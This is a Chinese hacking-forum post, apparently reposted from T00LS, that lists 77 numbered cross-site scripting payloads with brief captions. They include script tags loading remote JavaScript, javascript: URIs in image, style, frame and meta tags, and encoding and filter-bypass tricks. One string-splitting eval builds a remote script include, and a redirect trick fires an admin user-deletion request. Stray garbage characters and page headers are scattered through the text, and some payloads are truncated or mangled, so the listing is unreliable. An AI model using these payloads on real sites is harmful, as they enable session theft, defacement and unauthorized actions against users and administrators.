貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。3 c/ V. f8 e( s7 M8 @
(1)普通的XSS JavaScript注入
+ r* c, { U) A3 y- h4 K8 O |<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. |/ @, c/ I8 p4 v$ j; U- h(2)IMG标签XSS使用JavaScript命令) ]: P% c# d; G. K) s' X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" _$ P+ r* z% ]$ `/ o
(3)IMG标签无分号无引号
9 i2 W4 i; f2 j# b2 t/ {<IMG SRC=javascript:alert(‘XSS’)>
3 H+ \/ o5 R+ F. C# D& R6 M `(4)IMG标签大小写不敏感
- S1 e' Y, i; I0 v2 Q<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- s0 i# {' I; X" L(5)HTML编码(必须有分号)2 @: F! f- ^8 P* |# h
<IMG SRC=javascript:alert(“XSS”)>( b* m1 ?' Q( g. E6 F+ o
(6)修正缺陷IMG标签
. V% A6 n" r. ]" Y9 H4 c3 z<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>( K, i" j. e5 U6 K% X9 M( ~
6 V/ o$ f. O$ m1 j+ } B8 v
- y! M7 I5 y1 w! k; d' h
(7)formCharCode标签(计算器)' u4 T+ n% e" _
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>& g; w& f# m& m$ Z9 F
(8)UTF-8的Unicode编码(计算器)
! ?7 L: z% K' L7 F* z) b- ~<IMG SRC=jav..省略..S')>( E9 h. v9 t5 y/ C0 S2 E' w: v/ |: Z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; ]0 P5 }" k0 O7 Q3 ]5 ^. q' g& `<IMG SRC=jav..省略..S')>
/ J: i0 s7 ]) ~: b, T(10)十六进制编码也是没有分号(计算器)7 ?/ Y: T- v0 Y: d1 W
<IMG SRC=java..省略..XSS')>
a+ Y; M$ F1 M9 N6 o: h(11)嵌入式标签,将Javascript分开6 H U; ~( o c0 I2 j: `
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 H# {7 p5 `" ?" N
(12)嵌入式编码标签,将Javascript分开* t1 E# b8 D: K, Z6 S" a# N3 I$ L
<IMG SRC=”jav ascript:alert(‘XSS’);”>
|# _) k; B/ |; I: l; g(13)嵌入式换行符' t9 S( q1 \( e
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ n: H. P3 U0 [1 y4 x) D3 l/ c7 G
(14)嵌入式回车
& \1 {9 A" q# V8 G: T8 n" h<IMG SRC=”jav ascript:alert(‘XSS’);”>
& q) U4 D; ?% k5 q" z9 s(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 X; F' |, @8 c% \$ G) @0 l6 ~
<IMG SRC=”javascript:alert(‘XSS‘)”>/ \ ^/ v7 k& W
(16)解决限制字符(要求同页面)8 k2 o V! u% ~- a6 }
<script>z=’document.’</script>2 L2 _ C, [7 q+ `) Q6 h
<script>z=z+’write(“‘</script>6 P2 j! G0 N. _
<script>z=z+’<script’</script>
: }% T2 P) o( w; {<script>z=z+’ src=ht’</script>/ a3 f! h6 e+ ]9 l7 k
<script>z=z+’tp://ww’</script>& W( |6 F5 Y: U' ?3 O! K4 H' G1 J; F U
<script>z=z+’w.shell’</script>; X- X* f; C0 Z: r( ~% h: _: x, p* k$ A
<script>z=z+’.net/1.’</script>$ g* h8 E' k- L/ C' d
<script>z=z+’js></sc’</script>" I5 ?3 H! T q
<script>z=z+’ript>”)’</script>& N5 \- e. u3 N
<script>eval_r(z)</script>
9 Q5 `& q) f) v) `2 ?) Z1 C: Q. L+ R; W(17)空字符12-7-1 T00LS - Powered by Discuz! Board2 \; o* i8 @! g0 B3 R+ a9 [: W$ w
https://www.t00ls.net/viewthread ... table&tid=15267 2/6, z" d- u. G5 M, D" q' b
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
. j1 d/ g7 J/ \+ P8 i4 K% `- b(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用- a" N( {' T, r
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out0 w3 F+ j: V2 k
(19)Spaces和meta前的IMG标签# t2 ]7 w% k8 n, {
<IMG SRC=” javascript:alert(‘XSS’);”>
/ D. Q$ z x& b(20)Non-alpha-non-digit XSS
1 ?, B/ k- E' i6 I! I3 F4 u<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' p1 z1 C8 {9 X5 ]
(21)Non-alpha-non-digit XSS to 2: `1 _- W. I& o6 {
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' G! N" B. p) V, T3 m5 y1 j" Z3 F(22)Non-alpha-non-digit XSS to 3! A! A0 c) R3 |" @9 e, w1 C
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 i3 F2 [$ U# ^ w+ ^, I7 B(23)双开括号
$ [) r! W* ^3 T/ y<<SCRIPT>alert(“XSS”);//<</SCRIPT>5 r# d. u) Y2 z( s1 a- f
(24)无结束脚本标记(仅火狐等浏览器)/ [- o- m. M @! e% t; n5 q5 l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 _. |- }' C! D( M
(25)无结束脚本标记2
4 _+ [- N6 W# Y1 g9 ]<SCRIPT SRC=//3w.org/XSS/xss.js>3 ]; |7 o0 b: H; z" m9 L% Y+ T
(26)半开的HTML/JavaScript XSS
8 Y7 |% y a& D2 D0 P<IMG SRC=”javascript:alert(‘XSS’)”6 I) o s1 P, b
(27)双开角括号7 X' R6 O. u5 D2 @: q/ t9 O
<iframe src=http://3w.org/XSS.html <
& ?, ^3 C4 ]- z& e% A+ _(28)无单引号 双引号 分号
2 m, m5 W3 h: a# r: l, `3 p<SCRIPT>a=/XSS/" }+ D3 p5 M) G! h& t) w) t
alert(a.source)</SCRIPT>+ S3 n/ L5 v9 T. Q+ v3 _
(29)换码过滤的JavaScript
, q9 M; |+ P) t, z( R1 W" `; Z- Y\”;alert(‘XSS’);//; O: @9 P* z, q0 n6 t3 m- A7 m% u0 W
(30)结束Title标签; {0 I& t. J7 E y2 s: ^
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
. h9 I) {1 u6 R(31)Input Image
. ]% u% c" `/ h6 B( e5 C; ^8 q: J, f M<INPUT SRC=”javascript:alert(‘XSS’);”>
( [4 _2 f9 s. L' a6 Z) d2 D(32)BODY Image
* H1 [, Q& W1 m% g- y( d<BODY BACKGROUND=”javascript:alert(‘XSS’)”>! I% `# }2 {( ? i1 T) E, I
(33)BODY标签) c* P. Y+ m' Y6 U# m- B
<BODY(‘XSS’)>1 f p- Y* D) Z; W$ ]$ o- a
(34)IMG Dynsrc( W: n, F+ V/ x8 f4 w) Z
<IMG DYNSRC=”javascript:alert(‘XSS’)”>. |# k5 @ ~, l# S, S' |# E! @: M
(35)IMG Lowsrc
2 S4 C! B; \6 ^* f0 p: U4 k; _<IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 g4 ^" ^, s; \0 `0 Q9 c. B(36)BGSOUND4 x7 _2 \& c( L5 E. T/ E
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( s+ x4 G q; n5 M(37)STYLE sheet
) d( q2 @4 G0 }9 T1 p6 _/ u4 c' e<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- @: n9 s8 n5 |) E4 G
(38)远程样式表
/ a- J5 ^6 h: q<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" ~# ^0 ~; q3 Y, m! K
(39)List-style-image(列表式), G1 D1 |7 ^2 H& n: U' H
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: I' X3 H4 k: V4 N5 B* |(40)IMG VBscript
- g! O- `/ @0 |+ V+ x<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS9 K* z4 @7 o+ ]6 b M
(41)META链接url' t; l t* S! f$ |
" a& Y: h; Y& @! h& x/ P
- n3 U2 `' v) x/ v<META HTTP-EQUIV=”refresh” CONTENT=”0;8 y( [7 }1 c# q0 S; ~
URL=http://;URL=javascript:alert(‘XSS’);”>
" z* H7 g* [; O( t3 a- E1 `(42)Iframe6 e* ]6 i2 i6 H+ D
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( z C: |1 r& ?. H( K6 N- \ t
(43)Frame0 V4 t' S( C1 u1 e* c; n9 p9 y
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board4 ^2 z; G/ e4 o1 [
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
( s* c% b8 O, [. v( Y. c(44)Table
% Y; |* C# t5 t$ O$ F7 C<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. q7 s$ @' f% O. f
(45)TD4 c/ L, ~2 Z; N/ Y1 f x
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 E/ S. \; [: Y' z, A(46)DIV background-image A! C, {2 b7 p; A7 I" o2 D0 q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( ?( V+ u4 s1 Z5 b(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-$ z6 y/ d% L+ g5 w' g7 A, K7 x, l
8&13&12288&65279)- f; A8 Y4 a+ f+ J$ n/ @
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- w7 p; T( l% i9 t7 F4 r(48)DIV expression! d8 V/ U0 l* B6 b# D& j- _$ u6 p
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>: w* a% N; e1 H) \" Q+ O
(49)STYLE属性分拆表达
4 S6 }9 c: ^5 [# V7 | C<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( o) ~3 X: P* `: \6 U% y(50)匿名STYLE(组成:开角号和一个字母开头)
0 ]5 l( Z! H: O& N! z. ]" X3 w<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 L2 L) J+ c) Q& L
(51)STYLE background-image+ F% q1 `7 \8 {% Q0 ?3 v
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A) |/ p) b' B' i) g/ B3 l$ |2 Q
CLASS=XSS></A>. \+ ~3 t( N# K8 x: _, v/ ]+ r7 O
(52)IMG STYLE方式
! G5 O S0 f9 a5 ~: f$ Q- e6 M2 R: zexppression(alert(“XSS”))’>
9 y0 O1 b9 a: w3 J- p(53)STYLE background8 ]: z% ~5 |8 S) S. t0 l' G
<STYLE><STYLE! ^. V* q, Q; C" T$ L: l# {' v
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! b7 \7 m% R1 m(54)BASE
6 ^% [- M! q( R( D5 o- Y: K<BASE HREF=”javascript:alert(‘XSS’);//”>
3 b+ N% R0 w* u8 T; M* b(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ g) z, [3 h0 y& D+ g* [<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
9 J0 Y, l4 g( l3 U% M(56)在flash中使用ActionScrpt可以混进你XSS的代码- m, C$ j! N4 m. T; f4 F, A
a=”get”;8 S& b2 E Q! p& T: Z/ _- j
b=”URL(\”";
! P' z: v* a; Q# m. A& ~% Q3 A% xc=”javascript:”;: Z* M m. H, O2 l1 F6 t
d=”alert(‘XSS’);\”)”;
5 T/ k+ q: w5 X3 Reval_r(a+b+c+d);+ s0 m% `( u" a% z& [" h2 z
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上( ^* O2 S+ p3 y/ A- c. z {
<HTML xmlns:xss>
$ e$ S# G! T% ^0 ]8 r. p8 y<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
+ y% f/ w1 Z6 i& K! `9 u<xss:xss>XSS</xss:xss>
2 S( S; ~6 f* j& \2 \, K</HTML> M5 @( o; Y1 D T' E
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用* j0 K% ^) K. o8 @
<SCRIPT SRC=””></SCRIPT>3 i& o, E8 T, y, |
(59)IMG嵌入式命令,可执行任意命令$ h$ Y: T" w" d8 l
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# `6 F0 p! ^8 r; [3 `(60)IMG嵌入式命令(a.jpg在同服务器)
9 ?" O: `" g% s6 [Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 c# Z: t: r2 U9 f' T/ `(61)绕符号过滤
# c: K9 H6 Q8 q6 L& G7 k<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 G5 ]3 @3 r- k$ V' i3 G, _! M
(62)
1 J( z+ M. h# {: W$ C4 H; s<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 T& {: U# n7 o1 X' U% ^
(63)4 k8 P1 v y! s; F/ e/ a
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
! o4 g ^6 S2 X' k" g( ]8 a(64)
6 o! v& U4 M5 f<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
- l( k# Y" d9 [(65)
' s: I& Q; s3 k' u% Q/ k<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
% S# a5 T m! c( _" V$ F" D0 t(66)12-7-1 T00LS - Powered by Discuz! Board
" w. V0 X! v0 S% Y5 |5 I, I- ]https://www.t00ls.net/viewthread ... table&tid=15267 4/6
! t' ~4 ?# @4 S( g/ s- ^<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>8 _2 ~) S+ T6 D, |( A2 `
(67)
/ q" a u& e& ^; _" D<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>% O' G& h- M2 I% o0 t4 h
</SCRIPT>
$ @2 d1 }, ]6 p: D& N(68)URL绕行2 R; v# w" }5 ^& M4 l7 U8 E
<A HREF=”http://127.0.0.1/”>XSS</A>. b( }; [: ?# G; R4 v9 S. H. G# V
(69)URL编码; b2 \0 L# K! p0 ^
<A HREF=”http://3w.org”>XSS</A>, ?9 }% t; c6 y- Q1 O
(70)IP十进制7 J4 { _: R# f- S9 Q
<A HREF=”http://3232235521″>XSS</A># U e0 r& O" y( N
(71)IP十六进制8 K# T2 S. b0 q3 j: `
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>% t% ^* V8 N- Q2 ^
(72)IP八进制5 O- E- v2 e( A' i0 [6 a) I
<A HREF=”http://0300.0250.0000.0001″>XSS</A>2 c& l( m a4 I* [
(73)混合编码; a6 z' F; `, ?% P0 o
<A HREF=”h
8 l# x7 y8 ^; U7 \, D* u3 N: U9 }tt p://6 6.000146.0×7.147/”">XSS</A>
' j5 p8 P/ U7 v6 G& w/ r7 Q(74)节省[http:]
( @8 S; f) h# f4 \* ?: d y* ^7 Q- i<A HREF=”//www.google.com/”>XSS</A>
0 X/ D7 n3 X; d# S(75)节省[www]
( V9 N0 ^/ D# N+ }<A HREF=”http://google.com/”>XSS</A>
3 u; O- \) Z5 P7 U$ B7 z$ x(76)绝对点绝对DNS0 M. v4 L; f6 k4 M g' ^, T
<A HREF=”http://www.google.com./”>XSS</A>
9 I( [: P G$ x. z5 V: X( K/ K(77)javascript链接0 i- h" [8 _( x8 O
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
3 N5 H* x( F7 L1 O1 I; `' {5 Y; k- B9 m
原文地址:http://fuzzexp.org/u/0day/?p=14
, K$ b6 e5 U! j- m! Q8 R% {' Y5 s6 j( C. r9 b, x
|
发表于 2013-4-19 19:22:37
收藏
支持
反对